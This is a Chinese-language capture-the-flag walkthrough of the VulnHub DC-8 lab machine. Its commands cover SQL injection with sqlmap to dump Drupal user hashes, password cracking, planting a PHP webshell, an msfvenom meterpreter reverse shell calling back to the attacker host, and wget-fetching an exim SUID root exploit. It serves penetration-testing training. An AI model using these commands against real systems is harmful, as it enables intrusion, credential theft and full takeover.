下载链接：https://download.vulnhub.com/dc/DC-8.zip

知识点：

• sqlmap 注入出用户名密码
• msfvenom 生成脚本+msf反弹shell
• suid-exim 提权

目录

<1> 信息搜集

<2> 反弹shell

(1) 利用kali自带webshell代码

(2) msfvenom制作反弹shell脚本

<3> Privilege Escalation(suid-exim提权)

---

<1> 信息搜集

扫一下靶机的ip

nmap -sP 192.168.236.0/24 扫描一下靶机ip

靶机ip: 192.168.236.138

nmap -A -p 1-65535 192.168.236.138 扫描一下靶机开放哪些服务

开放了22端口的 ssh服务和80 http服务

 url栏中有一个?nid=1  改变为2 就是Who We Are 可能存在sql注入漏洞 加上 ' 验证一下

 出现sql报错语句，存在整形注入 1 and 1=1 正常 1 and 1=2报错

上sqlmap，  爆一下数据库

sqlmap -u "http://192.168.236.138/?nid=1" --batch --dbs

 得到数据库 d7db, 然后爆一下表名

sqlmap -u "http://192.168.236.138/?nid=1" --batch -D d7db --tables   

 sqlmap -u "http://192.168.236.138/?nid=1" --batch -D d7db -T users --columns 

爆一下字段

 sqlmap -u "http://192.168.236.138/?nid=1" --batch -D d7db -T users -C "name,pass" --dump

得到name和pass：

| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john  | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |

把两个密文写入txt，然后john爆破一下，只爆出来一个turtle

回到登录界面 /user/login

成功登录 john    但是ssh连接不了

 

<2> 反弹shell

(1) 利用kali自带webshell代码

 在webform里的 Form settings 发现可以编辑执行php代码

往contact us里写入webshell（kali里有 前面文章也发过）

注：不能只有php代码，前面还有有一段html 比如：<p>Success</p> 否则php代码不执行

 之后回到contact us那里 submit

转为交互式

python -c 'import pty;pty.spawn("/bin/bash")'

(2) msfvenom制作反弹shell脚本

 使用msfvenom制作反弹shell脚本

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.236.128 lport=4444 R >shell.txt

把生成的php代码复制到 contact us_settings那里

kali设置msf选项 use multi/handler，进行监听kali的4444端口

run 开启监听后，submit 之前生成的shell脚本执行之后   shell 然后python转为交互式：

<3> Privilege Escalation(suid-exim提权)

查看具有SUID的二进制可执行文件

find / -user root -perm -4000 -print 2>/dev/null

发现exim4命令   --version 得到版本为 exim4 4.89

 searchsploit exim

发现可利用的提权脚本  46996.sh

searchsploit -m 46996.sh 下载下来。

python -m http.server 1234  开启一个http服务

然后回到靶机的shell里

cd /tmp
wget http://192.168.236.128:1234/46996.sh
chmod 777 46996.sh
./46996.sh -m netcat

 拿到flag